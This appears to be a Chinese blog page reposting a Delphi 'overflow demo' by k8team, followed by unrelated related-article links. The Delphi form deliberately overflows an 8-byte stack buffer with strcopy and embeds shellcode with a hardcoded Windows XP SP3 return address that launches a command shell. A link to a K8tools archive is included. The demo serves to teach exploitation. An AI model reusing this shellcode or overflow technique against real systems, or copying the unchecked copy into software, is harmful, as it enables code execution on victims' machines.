[源码]Dephi溢出demo( Shellcode for XP)

unit Unit1;

interface

uses

  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

  Dialogs, StdCtrls;

type

  TForm1 = class(TForm)

    Edit1: TEdit;

    Button1: TButton;

    Button3: TButton;

    procedure Button2Click(Sender: TObject);

    procedure Button1Click(Sender: TObject);

    procedure Button3Click(Sender: TObject);

  private

    { Private declarations }

  public

    { Public declarations }

  end;

var

  Form1: TForm1;

 const

     ShellCodeSize = $00000079;  //16进制 -  121

//delphi overflow demo  by k8team

ShellCode : Array[0..ShellCodeSize-1] of byte =

(

//AAAA BBBB CCCC

$41,$41,$41,$41,$42,$42,$42,$42,$43,$43,$43,$43,   //115 73

$12,$45,$fa,$7f,  // xp sp3 跳转地址

//CMD ShellCode

$55,$8B,$EC,$33,$C0,$50,$50,$50,    //105  69

$C6,$45,$F4,$4D,$C6,$45,$F5,$53,

$C6,$45,$F6,$56,$C6,$45,$F7,$43,

$C6,$45,$F8,$52,$C6,$45,$F9,$54,

$C6,$45,$FA,$2E,$C6,$45,$FB,$44,

$C6,$45,$FC,$4C,$C6,$45,$FD,$4C,

$8D,$45,$F4,$50,$BA,$7B,$1D,$80,

$7C,$FF,$D2,$55,$8B,$EC,$83,$EC,

$2C,$B8,$63,$6F,$6D,$6D,$89,$45,

$F4,$B8,$61,$6E,$64,$2E,$89,$45,

$F8,$B8,$63,$6F,$6D,$22,$89,$45,

$FC,$33,$D2,$88,$55,$FF,$8D,$45,

$F4,$50,$B8,$C7,$93,$BF,$77,$FF,

$D0

);

implementation

{$R *.dfm}

procedure TForm1.Button1Click(Sender: TObject);

var k8test:pchar;

  procedure k8overflow(k8test:pchar);

  var test :array[0..7] of char;

  begin

    k8test:=pchar(edit1.text);

    strcopy(test,k8test);     //溢出

  end;

begin

  k8test:=pchar(edit1.text);

  k8overflow(k8test);

  application.MessageBox('没有溢出!','test');

end;

procedure TForm1.Button2Click(Sender: TObject);

begin

  application.MessageBox('溢出了!','test');

end;

procedure TForm1.Button3Click(Sender: TObject);

var k8test:pchar;

  procedure k8overflow(k8test:pchar);

  var test :array[0..7] of char;

  begin

     k8test:=@ShellCode;

     strcopy(test,k8test);  //溢出

  end;

begin

  k8test:=pchar(edit1.text);

  k8overflow(k8test);

  application.MessageBox('没有溢出!','test');

end;

end.

https://github.com/k8gege/K8tools/blob/master/Dephi%E6%BA%A2%E5%87%BAdemo%20by%20k8team_1103%5BK8%5D.rar

[源码]Dephi溢出demo( Shellcode for XP)的更多相关文章

  1. 看源码和写demo是一种比较容易提升的方式

    github就是要这么用才行.看别人的源码,就能了解到很多规范,而写demo,就是自己写出自己的代码.莫欺少年穷

  2. 基于wke封装的duilib的webkit浏览器控件,可以c++与js互交,源码及demo下载地址

    转载请说明原出处,谢谢~~ 前些日子用wke内核封装了duilib的webkit浏览器控件,好多群里朋友私聊我希望可以我公布源码,今天把这个控件的源码和使用demo公布.其实这个控件封装起来没什么难度 ...

  3. [c#]asp.net开发微信公众平台(7)前6篇的整体框架demo源码

    这里给出的demo是具备整体框架的微信公众平台源码, 所谓demo就是拿过去就可以直接演示使用的东西,  当然不会具备非常详细的具体到业务层面.数据层面的东西, 每个人都可以在此基础上自由发挥,  只 ...

  4. Spring源码学习:第1步--在Spring源码中添加最简单的Demo代码

    为了最大程度地贴近Spring源码并进行学习,一种比较直接的做法是:直接在Spring源码中加入Demo代码,并进行调试. 参照以前使用Spring的经验,Spring最简单的使用方法是:一个实体类. ...

  5. [转]Asp.Net大型项目实践(11)-基于MVC Action粒度的权限管理【续】【源码在这里】(在线demo,全部源码)

    本文转自:http://www.cnblogs.com/legendxian/archive/2010/01/25/1655551.html 接上篇Asp.Net大型项目实践(10)-基于MVC Ac ...

  6. Entity Framework在Asp.net MVC中的实现One Context Per Request(附源码)

    上篇中"Entity Framework中的Identity map和Unit of Work模式", 由于EF中的Identity map和Unit of Work模式,EF体现 ...

  7. [AYUI]QQ管家源码已经开源

    (0-50元 黑色字体     享受AY 1周的 ayui 技术问答) (50-100元 绿色字体 享受AY 15天的 ayui 技术问答) (100-150元 蓝色字体 享受AY 20天的 ayui ...

  8. 语音分享应用ios源码

    该源码是语音分享应用源码,本demo使用了科大讯飞语音识别作为分享内容的输入方式,同时也支持手动键盘输入分享内容,限制分享内容文字不能超过180个字符,分享内容输入完成后可以直接分享,分享SDK使用的 ...

  9. C#源码大汇总

    C#高仿QQ2013可在广域网部署聊天系统GG叽叽 动态显示硬盘分区容量饼图 自定义ProgressBar控件高仿Win8进度条 多皮肤精美在线QQ悬浮客服插件 jQuery仿天猫首页多格焦点图片轮播 ...

随机推荐

  1. pytorch入门之安装和配置

    pytorch是一种python接口的深度学习框架,其他的框架还有caffe,tensorflow等等. 1,pytorch目前支持linux和OSX两种系统.支持的Python版本有2.7,3.5, ...

  2. 手游开发之lua的table 元表的运用

    元表在项目中的运用,其中就包括元方法这点.元方法是指__index和__newIndex,下面我总结下,更详细的例子讲解可以参考<lua程序设计 第2版>的第13章内容.长h短说,简言之有 ...

  3. linux用户和组管理,/etc/passwd 、/etc/shadow和/etc/group --学习

    一./etc/passwd 和/etc/shadow解释 与用户相关的系统配置文件主要有/etc/passwd 和/etc/shadow,其中/etc/shadow是用户资讯的加密文件,比如用户的密码 ...

  4. [leetcode]244. Shortest Word Distance II最短单词距离(允许连环call)

    Design a class which receives a list of words in the constructor, and implements a method that takes ...

  5. 新建一个项目,如何使用abp用户登录系统

    1.首先参考Framework.Web里的packages.config,把相关的包都安装好. 2.App_Start文件夹下的xxxModule.cs和Startup.cs拷过来,修改下命名空间. ...

  6. Xadmin添加,编辑,删除

    Xadmin添加,编辑,删除 1.HTML 编辑和添加页面得内容相同,使用include将他们整合 {% include xxx.html %} 获取指定页面的所有内容 1.单独建个html存放编辑和 ...

  7. Python下安装MySQLdb模块

    ----------------------[针对Windows下python 的MySQLdb模块安装]--------------------- 一.检查MySQLdb模块是否安装,可在DOS命令 ...

  8. boost asio 学习(六) 定时器

    http://www.gamedev.net/blog/950/entry-2249317-a-guide-to-getting- started-with-boostasio?pg=7 6 定时器 ...

  9. boost asio 学习(一)io_service的基础

    原文  http://www.gamedev.net/blog/950/entry-2249317-a-guide-to-getting- started-with-boostasio/ 编译环境 b ...

  10. java多线程系列6 synchronized 加强版 ReentrantLock

    ReentrantLock类是可重入.互斥.实现了Lock接口的锁,它与使用synchronized方法和快具有相同的基本行为和语义,并且扩展了其能力.ReenreantLock类的常用方法有: Re ...